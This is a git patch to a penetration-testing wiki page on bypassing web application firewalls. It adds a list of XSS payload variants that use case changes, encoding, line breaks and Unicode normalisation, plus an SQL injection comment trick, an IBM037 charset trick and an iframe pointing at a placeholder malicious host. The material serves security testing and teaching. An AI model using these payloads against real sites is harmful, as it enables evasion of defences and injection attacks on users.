From f8c7abee39f57e5820faca6da37be4d250124e5d Mon Sep 17 00:00:00 2001
From: Ally Petitt <76501220+ally-petitt@users.noreply.github.com>
Date: Wed, 31 May 2023 20:00:55 -0700
Subject: [PATCH] Clean up and add additional WAF bypass techniques to
 waf-bypass.md

---
 .../pentesting-web/waf-bypass.md              | 55 +++++++++++++++++--
 1 file changed, 51 insertions(+), 4 deletions(-)

diff --git a/network-services-pentesting/pentesting-web/waf-bypass.md b/network-services-pentesting/pentesting-web/waf-bypass.md
index f8e42e81..f5c7242b 100644
--- a/network-services-pentesting/pentesting-web/waf-bypass.md
+++ b/network-services-pentesting/pentesting-web/waf-bypass.md
@@ -12,13 +12,36 @@
 
 </details>
 
+## Regex Bypasses
+Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks,
+and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)
+and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
+
 ```bash
-# IIS, ASP Clasic
-<%s%cr%u0131pt> == <script>
+<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
+<<script>alert(XSS)</script> #prepending an additional "<"
+<script>alert(XSS) // #removing the closing tag
+<script>alert`XSS`</script> #using backticks instead of parenetheses
+java%0ascript:alert(1) #using encoded newline characters
+<iframe src=http://malicous.com < #double open angle brackets
+<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
+<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
+<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
+Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
+javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
+<iframe src="javascript:alert(`xss`)"> #unicode encoding
+/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
+new Function`alt\`6\``; #using backticks instead of parentheses
+data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
+%26%2397;lert(1) #using HTML encoding
+<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks 
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
+```
 
-# Path blacklist bypass - Tomcat
-/path1/path2/ == ;/path1;foo/path2;bar/;
 
+## Charset Encoding
+
+```bash
 # Charset encoding
 application/x-www-form-urlencoded;charset=ibm037
 multipart/form-data; charset=ibm037,boundary=blah
@@ -38,6 +61,30 @@ Content-Length: 61
 %86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
 ```
 
+## Obfuscation
+
+```bash
+# IIS, ASP Clasic
+<%s%cr%u0131pt> == <script>
+
+# Path blacklist bypass - Tomcat
+/path1/path2/ == ;/path1;foo/path2;bar/;
+```
+
+## Unicode Compatability
+Depending on the implementation of Unicode normalization (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that share Unicode
+compatability may be able to bypass the WAF and execute as the intended payload. Compatible characters can be found [here](https://www.compart.com/en/unicode)
+
+### Example
+
+```bash
+# under the NFKD normalization algorithm, the characters on the left translate
+# to the XSS payload on the right
+＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>
+```
+
+## Exceeding Size Limitations
+
 It's common in cloud based WAFs that if the payload is bigger than X size, the request won't be checked by the WAF. You can simply use that to bypass them.
 
 <details>